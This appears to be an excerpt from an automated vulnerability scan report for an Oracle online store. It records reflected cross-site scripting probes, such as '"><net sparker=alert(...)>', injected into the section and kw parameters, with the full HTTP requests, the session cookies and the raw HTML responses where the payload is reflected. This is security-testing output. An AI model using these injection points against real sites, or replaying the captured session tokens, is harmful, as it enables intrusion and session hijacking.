anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZGDD6B3F751749224F20CCA3B98FFF8EB07A94918760B840AF&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarSelected"> <a class="OraTabBarSelected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""><net sparker=netsparker(0x002086)>"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column -----------------------------------------------..
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0&section=%22..

Parameters

Parameter Type Value
item GET 899068
beginIndex GET 0
section GET "><net sparker=alert(0x0024C3)>
nsextt GET '" ns= netsparker(0x000A1A)
sitex GET 14405:1435532:US

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=%22%3E%3Cnet%20sparker=netsparker(0x0024C3)%3E&nsextt=%27%22+ns%3D+netsparker%280x000A1A%29+&sitex=14405:1435532:US HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=899068§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=b17eb346c340928411983e9f8990d1192ee148dcc30af8e0dc8ef5056c827fd0.e34QbhaLa3mKbi0La3mQaNePax4Me0; GSI_pses=ZG646C7B7F146814053A6AA882C1B15103C476570BB3013BA0C0D852D79DD0DD76F2D9F2E6E0669C3F9FF3AF40C82691F7; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=xVxfLHAyvb67xnWKbZW4Jdim9G
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=b17eb346c340928411983e9f8990d1192ee148dcc30af8e0dc8ef5056c827fd0.e34QbhaLa3mKbi0La3mQaNePax4Me0; path=/OA_HTML; secure
Content-Length: 9990
Date: Sun, 11 Sep 2011 18:10:47 GMT
































<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG9E0A75260446115A1D1B726390FF90231D3B7FF94E7AA7E0&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $Header: ibeCCtdItemLeftBins.jsp 120.2 2005/11/16 ..
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0&section=876..

Parameters

Parameter Type Value
item GET 899068
beginIndex GET 0
section GET 87615
sitex GET 14405:1435532:US
cg GET -200
kw GET '" ns= alert(0x00258F)

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=87615&sitex=14405:1435532:US&cg=-200&kw=%27%22%20ns=%20netsparker(0x00258F)%20 HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=87615&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=6fb0fe17d430c0affffa6fd07aeb3e99eeacb573fdf61f4ae40fce4b89d9c100.e34Qb38Qax0Obi0La3mQaxaObxuNe0; GSI_pses=ZG8A748E20F1F87C5540881843A158C46F3E9F2A1DE344B0B0D51BF4B5941D9DEC2389096382E976AC5C981C3FAB724F0B; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=xVxfLHAyvb67xnWKbZW4Jdim9G
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=6fb0fe17d430c0affffa6fd07aeb3e99eeacb573fdf61f4ae40fce4b89d9c100.e34QbhaLa3mKbi0La3mQaNePax4Me0; path=/OA_HTML; secure
Content-Length: 10235
Date: Sun, 11 Sep 2011 18:11:17 GMT
































